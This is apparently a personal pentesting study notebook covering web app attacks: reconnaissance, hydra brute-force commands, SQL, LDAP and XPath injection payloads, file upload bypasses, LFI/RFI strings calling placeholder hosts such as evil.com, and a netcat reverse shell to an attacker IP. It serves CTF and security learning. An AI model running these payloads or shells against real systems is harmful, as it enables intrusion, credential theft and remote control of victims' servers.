Untitled

Web app hacking

Attacking Strategies
Phases:
Recoinnassance

Online searching: http://tools.kali.org/information-gathering/theharvester
Enumeration/Fingerprinting
How to probe ports: http://www.0daysecurity.com/penetration-testing/discovery-and-probing.html
More info on probed ports, web resources: http://www.0daysecurity.com/penetration-testing/enumeration.html
Identify services on all ports, check for outdated software/other potential vulns
Manual browsing + spidering  of website on BurpSuite.
Exploitation
Web app attack cheat sheet: Cheat sheet: https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet#The_Checklist
Top 10: https://www.owasp.org/images/f/f8/OWASP_Top_10_-_2013.pdf


https://lab.pentestit.ru/docs/TL8_WU_en.pdf CTF:
Top 4 Web app hacking vulns according to that:
1)information in HTML source
2)hidden directories
3)input places for injections
4)file upload


Fingerprinting/enumeration
Header info

For HTTP headers:
netcat [ip or domain] [port]
GET / HTTP/1.1
Host: [ip or domain]

For HTTPS headers:
openssl s_client -connect [ip or domain]:443
GET / HTTP/1.1
Host: [ip or domain]

If requests don't come back like they do in the browser (e.g 403 instead of 404), there is probs a WAF (web application
firewall) installed. In that case, mimic the browser and send a user-agent string in Zap's bruteforce)


Other

[+] Use Wappalyzer to identify known technologies.

Confirm use of PHP

All of these (along with solutions) can be found here, in the comments section: http://php.net/manual/en/security.hiding.php

If expose_php hasn't been set to off in the Apache conf file (which also hides .php extensions), then put this as
an argument to get php info: ?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000  //This is removed in PHP 5.5, I can't get it to work anymore

The PHP session ID cookie's name defaults to "PHPSESSIONID".

The website might have "X-powered by PHP" in a HTTP response header.

[+] Find out PHP version: //Removed since PHP 5.5, I can't get it to work anymore
Either through php info above, or by identifying what logo it has
https://labs.detectify.com/2012/10/29/do-you-dare-to-show-your-php-easter-egg/

[+] Search DNS records using dig.
http://securityidiots.com/Web-Pentest/Information-Gathering/Part-4-DNS-information-Gathering-with-DIG.html //not that useful

If the website is using shared hosting, you can attack the same server from other websites as well (you pwn one website, you can get to all the others as well). http://www.yougetsignal.com/tools/web-sites-on-web-server/

[+]Find potentially vulnerable folders or files that disclose information:
This is useful because hidden files may not be hardened against attacks, they may be backups that are either
old and therefore vulnerable or give away source code (browsing files like mypage.php.backup will display the code in HTML)
Also log files may contain sensitive data.

[+] Burp can be used for mapping the site.

[+] Inspect known HTTP headers and check for vulns (like outdated software,
remote file inclusion, etc).

nikto -h [domain or ip]

[+] Directory scans:

brute force directories/files (using wfuzz)
python wfuzz.py -c -z file,wordlist/general/big.txt --hc 404 http://vulnerable/FUZZ
for a time delay, do -s
if you're getting "soft 404s", then you can filter by character length  --hh number_of_chars_in_soft_404

(using dirbuster):
http://www.exploresecurity.com/three-cheers-for-dirbuster/

Identify the file extensions in use within known areas of the
application   (e.g.   jsp,   aspx,   html),   and   use   a   basic   wordlist
appended with each of these extensions (or use a longer list of
common extensions if resources permit).

(!)For each file identified through other enumeration techniques,
create  a  custom  wordlist  derived  from  that  filename.  Get  a  list
of common file extensions (including zip, ~ (created by emacs), (none at all), bak, txt, src, dev, old, inc,
orig,  copy,  tmp,  etc.)  and  use  each  extension  before,  after,  and
instead of, the extension of the actual file name.

Note:  Windows  file  copying  operations  generate  file  names  pre-
fixed with “Copy of “ or localized versions of this string

[+] Try to infer the name of the file based on the naming scheme.
For example,  if  a  page  viewuser.asp  is  found,  then  look  also  for  edituser.
asp, adduser.asp and deleteuser.asp. If a directory /app/user is found,
then look also for /app/admin and /app/manager.

[+] Read the comments that devs leave. They may contain useful info.

[+] Look at robots.txt. Might contain interesting pages.

[+] Check for directory listing. This is turned on by default. www.site.com/directory/ will give you a directory listing.

[+] Old files (which haven't been deleted but are no longer in use) may be in Google's archives.
Refer to OWASP testing guide v4's "Google Hacking" are for more info.

[+] If server uses some software (for example forum software phpbb), then check to see if the
dev has accidentally left some installation files there. Those could prove to be useful.
For example, for phpbb, that might be /phpbb3/install/install.php

[+]If you find a .git directory, then check this out: https://lab.pentestit.ru/docs/TL8_WU_en.pdf

[+] Joomla: Check out joomscan https://www.owasp.org/index.php/OWASP_Joomla_Vulnerability_Scanner_Usage
	 Wordpress: wpscan, might also want to check out wordpress sploit framework
	 CMS: Check out cmsmap
--------------------------------------------------------
Attacking web login applications/authentication methods
--------------------------------------------------------
[+] HTTP verb tampering:
Any HTTP method based authentication (like basic authentication or digest authentication), this should be tested.
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20OWASP%20testing%20guide%20v4.pdf
http://cdn2.hubspot.net/hub/315719/file-1344244110-pdf/download-files/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf?t=1464196641458
This works on ASP.net and Java EE where the dev has said
"Allow GET requests for admin, deny GET and POST requests for everyone else"
What he's forgotten is that while GET and POST are denied, everything else is allowed.
Where there's method-based authentication, this should be tried.

Also make sure nonexistent ones like JEFF are denied.

[+] PHP loose comparisons (check below)

[+] Bruteforcing (check below)

[+] Session fixation: refer to hacksplaining
----------------------------------------
Bruteforcing passwords/Password cracking
----------------------------------------
[+] Password cracking guide:
(This applies most to offline cracking)

(+) If there are no word mangling rules (need number, uppercase, symbol, etc), then most people don't
like to mangle passwords. About 51% don't use numbers and only 6% use uppercase.

Dictionary attacks with a lot of different words and not a lot of mangling work well here for
catching low-hanging fruit. In this blog there are all the words in wikipedia - blog.sebastien.raveau.name

(+) If here is a password creation policy, then you do have to use a smaller input dictionary and more mangling.
The best such input dictionaries are based on previously cracked passwords.

(+) The default mangling rules in John the Ripper work pretty well. However, they're designed
to crack weak passwords. Also, you can make your own rules, apply that to a wordlist and conti-
nually feed it to John using the -stdin option

(+) Probabilistic cracking:
Some words are more common than others: password, monkey, football
Some word mangling rules are more common: 123, 007, $$$

Probabilistic cracker assigns probabilities to everything:
dictionary word commonness,
word mangling rules
l33tspeak

These probabilities are created by a "training list"

If you need to attack a stronger set of passwords, you just create a stronger training list.
(This should be posted on this guy's site: reusablesec.blogspot.com)


(+) If all the passwords have individual salts, then "password" and "password" don't have the same
hash for different users, which is lame.
In that case, you can't crack all the hashes by just doing one round of cracking. You have to
do a round of cracking for every single hash, which is lame. In that case, just grab a wordlist
with previously cracked passwords and try those (since ppl reuse passwords)

(+) For attacking an individual, and not a huge list, you just have to create additional
wordlists and attack a high probability to words related to them: kids' names, pets' names,
parents, hobbies, etc. You can probably try passwords with high complexity and word mangling
(mby even bruteforce), depending on how much time you have (especially if you're just attacking admin)

(+) When bruteforcing, you should do letter frequency analysis
With that, you can figure out that some letters like "q" don't occur very much and you shouldn't try them

Also note that numbers are usually at the end and uppercase at the beginning (you can use crunch for this)

Markov models - figures out "human-like" words.
Basically says that "if you have the letter 'q', then the letter that follows it is almost alwaus 'u'"
This is built into John the Ripper
The result is that most of the things you get are words that look like they're taken from
a dictionary (like "dog"). But also, you get words like "stech", which seems like it could be a password.

[+] Bruteforce HTTP Basic Auth (the popup screen)
hydra -L users.lst -P passwords.txt -f www.site.org http-head /path/of/target/ -V
-V is verbose mode,  -f is exit after first login pair found

[+] Brute forcing http GET form:
http://www.sillychicken.co.nz/2011/05/how-to-brute-force-htt-forms-in-windows/

[+] The following is based on this:
http://insidetrust.blogspot.com.ee/2011/08/using-hydra-to-dictionary-attack-web.html

Bruteforcing ssh
hydra <IP address or domain> ssh -s 22 -P passwords.txt -L users.txt (or -l user) -e nsr -t 4 (e.g 4 threads)

Bruteforcing HTTP POST form:
hydra <IP address or domain> http-form-post "<login path, e.g /login.php>:<form username input, e.g username>=^USER^&<form password input>=^PASS^:<The failed login text, e.g Wrong login>" -l <username> -P <passwordlist, e.g 500-worst-passwords.txt> -t 10 (number of threads, I don't know why 10)

[+] If you want to crack PHP's md5, then the correct format is raw_md5, not any other md5 variant.

----------------------
Clickjacking
--------------------
Refer to the hacksplaining.com lesson about it.

-------------------------------------------------
SQLi/SQL injection
--------------------------------------------------

[+] As always, the first step to checking that the vulnerability exists is trying to get an injected query that gives the same reply as the legimitate one. For example:
?id=11-1  should be the same as   ?id=10  (if it's not a string)
also you can try ...UNION SELECT 1,2,3--


[+] Make sure the number of columns in the UNION  request matches the amount before the UNION.
You can do this with UNION SELECT 1, 2, 3, 4, etc. until you stop getting an error

What select 1 does is it gives you the first column, but replaces all values with ones. The formal name of the column remains the
same though (so if you do mysql_fetch_array(sqlquery)['id'] (and id is the first row), and the sqlquery is SELECT 1,
then it will give you 1. If you do SELECT 1, 2 and id is the second row, you get 2.

[+] When you want to comment something out, you need "-- " at the end. MIND THE SPACE.
The problem with URL bars in browsers is that even if you put that space at the end, it will take it off. Use %20 at the end instead.

[+] Keep in mind the left to right nature of SQL (like most other languages).
SELECT user, password WHERE user=admin AND password='' OR 1=1--
is equivalent to
SELECT user, password WHERE (user=admin AND password='') OR 1=1--
Meaning you'll get all users returned. Or, if only one user is returned, you'll only get the first user back.

[+] Quite often, you'll find 'username' and 'password' from the 'users' table.

[+] To get table and column info, type:
MySQL:  SELECT concat(table_name,':', column_name) FROM information_schema.columns

[+] SQLmap tutorial - http://www.binarytides.com/sqlmap-hacking-tutorial/
frst thing to try - sqlmap -u "mysite.com/sql.php?param=1"
POST request: https://hackertarget.com/sqlmap-post-request-injection/

[+] SQL Truncation attack - attack registration forms to gain access to any user account.
This might only work on MySQL. According to my testing it should work for even custom databases (not the default one).
Since the creators can specify their own max length, then you might want to put a shitload of whitespace in between there.
http://resources.infosecinstitute.com/sql-truncation-attack/

Register the following:
username: admin                         (lots of spaces in between)And then whatever.
password: mypassword123

"admin                " is equal to "admin", because the database discards any whitespace after that.

If the "username" accepts only, say, 20 characters (this is a default configuration), then MySQL truncates the input to 20 characters.
Meaning, the "And then whatever" gets discarded. Since whitespace doesn't count, you're effectively updating the record of "admin".

[+] Filter evasion:

Advanced ways to evade filters (using tricks like putting backslashes, using MySQL syntax, etc):
https://websec.files.wordpress.com/2010/11/sqli2.pdf

SQL smuggling for evading filters:
if "INSERT" is blacklisted, then do concat("INS", "ERT"). Also UNICODE smuggling: 'Ā' defaults to 'A' and won't be detected.
starts from like halfway into the document.

[+] Fixes:
Blacklisting is bad. Almost all blacklists can be penetrated using filter evasion techniques.
Whitelisting is better.
Prepared statements/Parameter binding (same thing) is the way to go. Makes it impossible to do SQLi
(unless it's incorrectly setup). You have to make sure that attackers can't change the command
from neither the query itself or when you get data from the database that they might have
changed (which is called second-order injection or something)

[+] Obscure edge gase: GBK addslashes()/real_escape_string() bypass.
http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

---------------------
NoSQL injection
---------------------
https://www.owasp.org/index.php/Testing_for_NoSQL_injection (better)
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20NoSQL%20But%20Even%20Less%20Security.pdf

[+] NoSQL databases often offer no security, so if you can connect to one, you can just query whatever you want.

[+] There are 150 different NoSQL databases, all of them work differently and have different syntax. So, to exploit one, you need to
familiarize yourself with the syntax. The most common one is MongoDB, so that's what the examples will be based on.

----------------
LDAP injection
----------------

[+] LDAP may be used instead of SQL when storing passwords (because it's really fast). In that case, use LDAP injection.
<backstory>
LDAP is used when a lot of different services have to be authenticated against a single back-end.
If you just want to use it for authenticating logins, it's better to just use the database you already have (so maybe like MySQL)
It's also useful if you want to incorporate authentication, privilege management and resource management in a database.


Good tutorial on how LDAP queries work:
https://technet.microsoft.com/en-us/library/aa996205(v=exchg.65).aspx
</backstory>

[+] LDAP Injection tutorial:
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Blackhat%20Europe%202008%20%20-%20LDAP%20Injection%20&%20Blind%20LDAP%20Injection.pdf

When using ldap_bind(), if no parameters are supplied, then it's considered an anonymous bind. That's one way to get into someone's account.
This works if the username and password aren't checked for emptyness and if they return NULL.
(!)The way to get parameters to be null is not by doing ?username=&password=, but by not putting them in there at all, so just ?.

If doing a search, then you can do an injection:
Let's take (&(uname=blah)(passwd=(blah2)) as an example.

Let's inject blah) into uname and blah2 into passwd
OpenLDAP doesn't read anything after (&(uname=blah)) closes (although I haven't seen an example where this works yet).
That means the (passwd=blah2)) will go unnoticed.
Otherwise, you can inject a NULL byte where you want to end the query and that might work as well.
OpenLDAP also just starts reading the query left to right and doesn't care if the part after the injection is syntactically incorrect.

Active Directory will throw an error when you try to put two queries (however some clients ignore the second query and only send the first one, making the injection work).
That means you'll have to make the injection into one query.

Let's inject blah)(injected_filter into uname and blah2 into passwd. Now we have a query with 3 filters.
(&(uname=blah)(injected_filter)(passwd=blah2))
This is a good way to check for injection. If injected_filter is (&) and the query is successful, then it works.
(!) (1=1) isn't the TRUE filter in LDAP. Use (&) instead! (1=1) gives you some weird shit that sometimes works, sometimes doesn't

Also, if * is allowed, then you can inject username=* to get the first username in the database.
Web for Pentester's examples are good if you want to look at the code (in the iso)
Also, (pass=) gives the same result as (pass=*)

(&(uid=*)(userPassword=*)(&))


---------------
File upload vulns
---------------
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Secure%20file%20upload%20in%20PHP%20web%20applications.pdf
this covers spoofing content-type, bypassing imagesize() and filetype checks.

[+] May be found: when you upload photos as your avatar, when you upload files for other ppl to see
[+] If you aren't allowed to upload .php, try uploading .php3 or .php.test (since Apache doesn't have handler for that, it will be used as .php)
If the dev checks filetype by doing split(), then shell.jpg.php will work
[+] To change MIME type (NOT the same as getimagesize()), use burpsuite.
[+] To bypass getimagesize(), send a valid image with php in its comments

This can be done using jhead.
https://phocean.net/2013/09/29/file-upload-vulnerabilities-appending-php-code-to-an-image.html

First, clear the headers using
jhead -purejpg <filename>.jpg

Add exif jpeg comment
jhead -ce <filename>.jpg

Write your php here. Note: the editor is vim I guess. (<can't remember, maybe 'i' for insert, ESC for exiting insert, :wq for save file and quit)
For example (note the __halt_compiler() at the end. Otherwise the image bytes will get executed)
<?php echo "hi"; __halt_compiler();?>

[+] .htaccess is awesome (nginx doesn't support .htaccess files, only Apache). Can turn .jpg into .php or even the htaccess itself into .php.

[+] The solution is to prevent the users from accessing those files directly by putting them
outside the webroot and also by obfuscating the name, so that it's very difficult to get it
by using LFI. Also prevent all the types of tricks mentioned in the article.

[+] Anti filetype checking methods:
Check what extension and what content can be uploaded.
	Try to upload PHP file with the extension changed to the correct one (bypasses extension)
	Try to upload a file in the correct format with the extension changed to .php (bypasses content)
	If both enabled, do either;
		add PHP payload to a PDF file
		create PHP file that looks like PDF and bypasses the content-type check (much safer)
		(there are also kali linux programs that do this)
			https://pentesterlab.com/exercises/php_include_and_post_exploitation/course
			Under "exploitation of local file include"
-------------------------------------------------------
RCE/Code injection/Command execution/Command Injection:
-------------------------------------------------------
[+] Use burp. It's so useful! For example, in one challenge, the programmer did a header("someotherlocation") when he detected that the formatting
wasn't right. But he forgot to put return afterwards. So you could see the response come back in burp and see the results of your command injection.

[+] if you can provide parameters to shell_exec() or exec() or passthru(), then you have a number of options.

Look at the list of bash redirection and command operators:
http://unix.stackexchange.com/questions/159513/what-are-the-shells-control-and-redirection-operators
Redirect stderr to stdout:
2>&1
use ; or && or & to do multiple commands (you should encode these, especially the &).

There's also notation for putting commands inside other commands.
The following are equal to ping 127.0.0.1:
ping `echo 127.0.0.1`
ping $(echo 127.0.0.1)
This allows you to execute random commands

If you know what command they're using inside exec(), make sure to experiment with edge cases on the command line.
For example:
exec(ping blah 127.0.0.1);  //is equal to
exec(ping 127.0.0.1);
So you can put anything instead of blah (like another command) and nothing bad will happen to you.

Also you can check for typos. So if $shitdev puts "| " into the blacklist,
then injecting "| ls" will get blacklisted, but "|ls" won't.  Also he might've blacklisted ' instead of `, you never know.

filters will probably be doing a preg_match on the string.

It might be possible to do a multi-line command.
For this, put an encoded newline (%0a) and your command after the initial command.

-------------------------------------------------------
Local File Inclusion/LFI/Directory Traversal
-------------------------------------------------------
http://securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html

[+] LFI often happens  in multi-language websites. It gets the $language from either the cookie or
the GET request and then includes language/$lang.php.

[+] Log files, cookies and other methods can be used to achieve LFI (and RCE):
https://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution

[+] Putting a null-byte in between a string *might* make the string stop in some commands, for example in includes (because that's how it works in C).
For example, include("shell.php\0.img") and will try to include "shell.php". In URL encoding, the NULL byte is %00.
Doesn't work since PHP 5.3.4 (preg_ functions should still be vulnerable)
If you try to do it after PHP 5.3.4, then it simply won't open anything with a null byte in it (even if you put the byte after the correct filename)
From my server: Failed opening 'http://www.maribell.ee' for inclusion, when the url is ?lang=http://www.maribell.ee%00.whatever

[+] If null-byte doesn't work, use truncation.
http://securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html
http://security.stackexchange.com/questions/17407/how-can-i-use-this-path-bypass-exploit-local-file-inclusion

Basically, /etc/passwd is the same as /etc/passwd/ to PHP (IN SOME CASES, doesn't work on my PHP+Apache setup), because it strips trailing slashes. Also, PHP will truncate filenames longer than 4096 bytes. Meaning, you can do
/etc/passwd/./././././././././  (a lot of these) ././.php
and the .php at the end will get tossed away!

[+] Or you can inject code directly into the URL by doing data://. That way, it'll include the code directly from the URL (needs to be urlencoded and requires allow_url_include

https://www.idontplaydarts.com/2011/03/php-remote-file-inclusion-command-shell-using-data-stream/  //Use this one
http://securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html //I think data: can also be used instead of data://


[+] Double encoding:
If there's an attack detection system in place, then if there's also a decode() before the include()
, then you can bypass the detection system by double URL encoding the attack. This works because
it will be decoded the second time by the decode() and will be valid code.
This is a rare vulnerability though.
It might occur when the dev is dumb or when there's some kind of third party app in between the include() and GET,
which does the decode.


[+] Local file inclusion:

[+]View source code of php using filters (encrypt to base64)
Info at https://secure.php.net/manual/en/wrappers.php

from DVWA:
Low - ../../../../../../../../etc/passwd (on windows you'd do ..\)
Medium - ../ is filtered, but only once. Meaning, ....//, after filtering, becomes ../
High - Dev allows only certain files to be included, like file1, file2, file3. He did it by comparing the filename with "file*".
Meaning, file1/../file1.php returns file1.php.

[+] Good overview of all the options available for exploiting LFI: https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

[+] Methods of getting PHP on the server for LFI:
    inject the PHP code in the log: for example with a web server, by accessing a crafted URL (the path contains the PHP code), and including the web server log. http://securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html
    inject the PHP code in an email, by sending an email and including the email (in `/var/spool/mail).
    upload a file and including it, you can for example upload an image and put your PHP code in the image's comment section (so it won't get modify if the image is resized).
    upload the PHP code via another service: FTP, NFS, ...

    Also these: http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf
    /proc/self/environ (you'll probably get permission denied)  https://www.exploit-db.com/papers/12886/
	/proc/self/fd/...
	/var/log/...
	/var/lib/php/session/(PHP Sessions)
	/tmp/ (PHP Sessions)
	php://input wrapper
	php://filter wrapper
	data:// wrapper

   Also you can do it with anything that outputs phpinfo() (because the GET and POST variables are in it):
   http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20LFI%20with%20phpinfo()%20assistance.pdf
   (there was a way to get phpinfo to appear by doing ?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000, but this doesn't work since PHP5.5 (I couldn't get it to work on any website I tried anymore, not even my own)


[+] Including PHP files as base64 so you can read them:
https://secure.php.net/manual/en/wrappers.php.php
php://filter/convert.base64-encode/resource=index
Example: http://127.0.0.1/fileinclude.php?lang=php://filter/convert.base64-encode/resource=hello.php
Also you can do it with data:// (guide somewhere below)

--------------------------
RFI/Remote File Inclusion
--------------------------
[+] Remote file inclusion - how to pass any extension or suffix to the URL (like "google.com/.php") without errors:
If the include() script adds something like _lang.php or whatever at the end of it, then you don't need to
make the file end with _lang.php on the remote server. You can just put a "?" at the end of your include.
?include=http://malicious.com/shell.txt?_lang.php
The ? at the end of the URL is used to ensure any extension or suffix added to the URL will be interpreted by as a GET parameter. If the configuration of the vulnerable system doesn't allow remote file include, an error message is displayed.

[+] Exploitation of RFI:
https://pentesterlab.com/exercises/php_include_and_post_exploitation/course
Under "exploitation of remote file include"

When you include a web shell, you should include shell.txt, not shell.php.
If you include a php file, then the code runs on the external server, not yours.

[+] DVWA Remote File Include:
Low - ?page=http://evil.com
Medium - use some other filestream, like php://. Info at https://secure.php.net/manual/en/wrappers.php
---------------
Post exploitation
----------------
[+] Create shell with netcat:

Attacker$ sudo nc -l -p 80
the attacker listens to port 80

Victim$ nc [attacker IP] 80 -e /bin/bash
The -e sign says to start up the program after connection and deliver the commands there
Not all versions of netcat have -e.

$ command-name 2>&1
Redirect error messages to stdout instead of stderr (so you can see the errors)


[+] Create "true" shell with socat:
Presumes a previous shell on port 80 with the netcat shell.
https://pentesterlab.com/exercises/php_include_and_post_exploitation/course

--------------------
Linux host reviewing
--------------------
*I'll put only offensive things here. For defensive ones (logging, etc), go to https://pentesterlab.com/exercises/linux_host_review/course
*If there's lots of info, use "| less" to view it one by one.

[+] Get Kernel info:

uname -a
gives kernel info

uptime
can be used to estimate how long it's been since the system's been patched.

[+] Check for vulns:

dpkg -l | less
List all installed programs

go to cvedetails and see if there are any unpatched programs to exploit (probably have to judge by uptime, unless it's been even longer since it was updated?)

[+] Get general info:

ifconfig -a
to see what network interfaces are present;

route -n
to get the system routes. If the system does not have the route command installed, netstat -rn can be a suitable substitute.

cat /etc/resolv.conf and cat /etc/hosts
to know more about the DNS configuration of the system.

[+] firewall rules:
iptables -L -v
ip6tables -L -v

[+] Check file privileges (/etc/shadow should be with root privileges)
ls -l /etc/ | less (gives it for all the files in the directory, so just find the right one)
do this with /etc/shadow, /etc/shadow.backup, /etc/mysql/my.cnf, Apache SSL private keys

[+] setuid files
These are files which run with the owner's privileges instead of the user's.
If the owner is root, they can be a security problem. The "passwd" utility is one such setuid file.

find / -perm -4000 -ls
Retrieves list of setuid files.
For each file found, check if it's legitimate and if permissions are set correctly.

[+] Find files that can be read from/written to.
*You'll probably want to filter out /proc/ answers by doing "| grep -v /proc"

Using find, you can retrieve a list of files that are readable and write-able by any users using the following command:
# find / -type f -perm -006  2>/dev/null

and a list of files write-able by any users using:
find / -type f -perm -002  2>/dev/null

[+] UID 0 users
A common misconfiguration/backdoor of the /etc/passwd is to have a user with the uid 0. On traditional systems, only root is supposed to have the uid 0. If another user has the uid 0, he's basically root on the system.

[+] /etc/shadow hash:
You can check what encryption is used by checking the hash format, if the hash:
    does not have a $ sign, DES is used;
    starts by $1$, MD5 is used;
    starts by $2$ or $2a$, Blowfish is used;
    starts by $5$, SHA-256 is used;
    starts by $6$, SHA-512 is used.

This can also be used
cat /etc/pam.d/common-password

[+] sudoers
The sudo configuration is stored in /etc/sudoers:

# egrep -v '^#|^$'  /etc/sudoers
Defaults  env_reset
root  ALL=(ALL) ALL
%sudo ALL=(ALL) ALL
user  ALL=(ALL) NOPASSWD: ALL

We can see there that the user named user can be any users (including root) without any passwords and without restriction.

A common mistake with sudo is to provide a user with a limited set of commands that will still allow him to get a root shell on the system. For example, a user with access to /bin/chown (change owner) and /bin/chmod (change mode) will be able to copy a shell in his home and change the shell owner to root and add the setuid bit on the file. This way, this user will be able to have a root shell on the system.

[+] Services:

ps -edf
Running services

# lsof -i UDP -n -P
UDP services

# lsof -i TCP -n -P
TCP services

--------------------------------
CSRF/Cross Site Request Forgery
--------------------------------
[+] Ways to do PUT/GET request without victim input:

POST:
make POST form with hidden inputs and use JavaScript to send the POST request

GET:
Make image with zero width and length and src=The_CSRF_Link. The GET request is made automatically.

PUT/DELETE:
This one is very difficult. Can only be accomplished with like browser plugins/plugin vulns and stuff.

[+] If referrer header is checked, then two options:
1)If site.com/csrf checks that "site.com" is in the string, you can send the query from
malicious.com/site.com or
site.com.malicious.com
2)Use XSS (like reflected XSS) to achieve the goal.

[+] If an anti-CSRF token is added, you need XSS.

------------------------------------------------
HTTP Request Smuggling/HRF/Web Cache Poisoning
------------------------------------------------
OWASP: https://www.owasp.org/index.php/Cache_Poisoning
Do root-me challenge to learn this.

---------------------------------
Global register poisoning
---------------------------------
http://repository.root-me.org/Programmation/PHP/EN%20-%20Using%20register%20globals%20in%20PHP.pdf
[+] Turned off by default since PHP 4.2.0 and deprecated since PHP 5.3.0!
With this, you can initialize any uninitialized variables using get requests.
It's good to have source code available with this.

Example:
<?php
	if (1==2) {
		$maths = False;
	}
	if ($maths) {
		loginToWebpage()
	}
?>

You can do vulnerable/registerpoison.php?maths=1 (because 1 == True) and get logged into the webpage.

--------------------------------------
PHP loose comparisons/Type juggling
--------------------------------------
(check the link for all the examples)
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20PHP%20loose%20comparison%20-%20Type%20Juggling%20-%20OWASP.pdf
Can be used for CSRF token bypass, for authentication bypass

[+] PHP has loose comparisons ("==") and strict comparisons ("===")

Loose comparisons has some weird conversion rules.

JSON is really useful because you can also send ints and bools and stuff, not just strings.

Importantly, any string which has a letter or "0whatever" in the beginning is equal to int(0). If it begins with "123whatever", it's equal to int(123)
!!Also TRUE == "whatever" will also always return true.

JSON:
{"username":0}   //Might also work with "username":true
if (0 == "testusername") { //works also with (123 == "123testusername")
		echo "username bypassed";
}

[+] Also, with strcmp, if they've made a check with if(!strcmp($var1, $var2)) then they've fucked up,

Use this to determine what counts as TRUE and what counts as false.
http://php.net/manual/en/language.types.boolean.php

There are better options than the empty parentheses bexause passing the empty parentheses generates an error. If that error is caught, the exploit doens't work. Find a better way to get strcmp to be 0 (check root-me's type juggling solutions and also the php.net website.

JSON:
{"password":[]}

if (!strcmp([], "testpassword")) {
	echo "password bypassed";
}


[+] BTW, the same technique also works when using PHP serialized data instead of JSON!

-------------------------------
Server-Side Template inclusion
--------------------------------
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Server-Side%20Template%20Injection%20RCE%20For%20The%20Modern%20Web%20App%20-%20BlackHat%2015.pdf

--------------------------------------
XEE/XML External Entity/XML Injection
--------------------------------------
The OWASP testing guide is most useful for this.
XXE can be used for:
1) DDOS
2) Data theft
3) (ADD TO THIS)

(less useful)
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20XML%20External%20Entity%20Attacks%20(XXE)%20-%20owasp.pdf
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20What%20You%20Didn't%20Know%20About%20XML%20External%20Entities%20Attacks.pdf

hacksplaining has a good explanation of External entities

<base knowledge of XML>
[+] Quick explanation of what an entity is http://www.w3schools.com/xml/xml_dtd_entities.asp

[+]An XML document is valid as long as it adheres to the DTD or the XML Schema.

[+] DTD - Document Type Definition.

order.xml could have a reference to order.dtd - the document type definition for order.xml

//This is in order.xml
<!DOCTYPE order SYSTEM "order.dtd">

//this is order.dtd. Says what elements need to be in order.xml
<?xml version="1.0" encoding="UTF-8"?>
<!ELEMENT account (#PCDATA)>
<!ELEMENT contact (#PCDATA)>
<!ELEMENT count (#PCDATA)>
<!ELEMENT order (product, count, orderer)>
<!ELEMENT orderer (contact, account)>
<!ELEMENT product (#PCDATA)>

[+] XML schema - order.xsd. Similar to order.dtd, but different syntax.


[+] Core XML security standards:
1)XML signatures
2)XML encryption
3)XML key management (XKMS)
4)Security Assertion Markup Language (SAML)
5)XML access control markup language (XACML)

XML core security
standards are only
of limited value when
the XML generator or
parser is the target of
the attack.

[+] Example of PHP's simpleXML used to process an RSS feed (which is just an XML file)
http://stackoverflow.com/questions/250679/best-way-to-parse-rss-atom-feeds-with-php ,the answer by brian cline

</base knowledge of XML>

[+] XML External entities

[+] XML generator injection:
You might be able to inject a fragment.
For example, you write the injection in the comment part of an online banking app.
Your code will get parsed in another app and you'll get the $$$.

<batchjob>
	<payment>
		<account>5678-attacker</account>
		<rcpt>206-1234</rcpt>
		<amount>100.00</amount>
		<comment> //INJECTION STARTS HERE
		</comment>
	</payment>
	<payment>
		<account>1234-victim</account>
		<rcpt>206-1234</rcpt>
		<amount>100.00</amount>
		<comment>Hacked
		</comment> //INJECTION ENDS HERE
</payment>
</batchjob>

[+] XPath injection.
http://www.w3schools.com/xsl/xpath_syntax.asp  //Xpath syntax tutorial
http://securityidiots.com/Web-Pentest/XPATH-Injection/Basics-XPATH-injection.html //Really useful! Also has blind in next tutorials.
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Introduction%20to%20Xpath%20injection%20techniques.pdf //intoduction to xpath injection
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Blind%20Xpath%20injection.pdf //Blind XPath injection.

If you want to find something  in xml document, you use xpaths. For example, querying "/a/b/c" will output "The value" in this: <a><b><c>The value</c></b></a>
Thus, we get xpath injections.

You can use [position()=1] to get the first element.

The equivalent of UNION in XPath is a pipe  '|'. When you do the pipe, only the results from the first statement count apparently (when doing the xpath_search, I think), so it's basically like commenting the rest out, I suppose.
Example:
/userdb/user[id='/*injection_starts_here*/' or position()=1]/New_Element_name|a['/*injection_ends_here*/']/username
You can see that two tricks are used here. First there's getting the first element using position()=1. Secondly, we've used a pipe to essentially comment out the rest of the query, so that we can get the value of New_Element_name instead of username returned to us.

Getting all the elements - http://securityidiots.com/Web-Pentest/XPATH-Injection/Basics-XPATH-injection.html

[+] 2014 Whitepapaer that's a great resource when pentesting XXE. From the same guys that did the OWASP talk below.
http://www.vsecurity.com/download/publications/XMLDTDEntityAttacks.pdf
"External Resource Inclusion via XInclude Support" - this can do pretty much everything external entities can do.

[+] THINGS NOT TO FUCK UP WHEN DOING XXE:
1) URL encode everything - especiall '&'
2) <!DOCTYPE blablabla    <--- doctype's closing bracket is only at the end!
3) You have to put the file:// before getting a file!

[+] SUMMARY OF OWASP TALK - Stealing data using XXE (From 2013 - check OWASP if anything's changed):
https://www.youtube.com/watch?v=eHSNT8vWLfc
(CTRL+F "(EXPLOIT) PARTS IF IN A HURRY. The rest is for better understanding.)
ONE MORE THING - it's really really easy to mess these hacks up, so make sure to test them out on a VM first (like Web For Pentester)
